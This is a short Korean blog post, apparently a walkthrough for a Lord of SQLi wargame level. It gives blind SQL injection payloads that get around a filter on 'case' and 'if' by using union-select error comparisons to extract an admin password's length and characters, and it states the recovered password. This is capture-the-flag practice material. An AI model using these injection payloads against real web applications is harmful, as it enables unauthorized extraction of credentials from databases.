티스토리 뷰
id='admin'의 pw를 알아내면 된다. case와 if에 필터링이 되어있는데,
select 1 union select 2를 이용하면 된다.
?pw=' or id='admin' and (select 1 union select (length(pw)=8))%23
와 같이 입력하면 length(pw)와 비교하는 값이 실제 pw의 길이일 경우에만 에러가 출력되지 않는다. pw의 길이는 8이다.
?pw=' or id='admin' and (select 1 union select (ord(substr(pw,1,1))=53))%23
와 같이 입력하면 ord(substr(pw,1,1)) 와 비교하는 값이 실제 pw의 첫째 자리 값일 경우에만 에러가 출력되지 않는다.
위를 이용하여 파이썬 프로그램을 작성하였다.
pw는 5a2f5d3c이다.
?pw=5a2f5d3c
를 입력하면 클리어
'hacking > LOS' 카테고리의 다른 글
| <LOS> - 21번(iron_golem) (0) | 2018.05.03 |
|---|---|
| <LOS> - 20번(dragon) (0) | 2018.05.03 |
| <LOS> - 19번(xavis) (0) | 2018.05.02 |
| <LOS> - 18번(nightmare) (0) | 2018.04.29 |
| <LOS> - 17번(succubus) (0) | 2018.04.29 |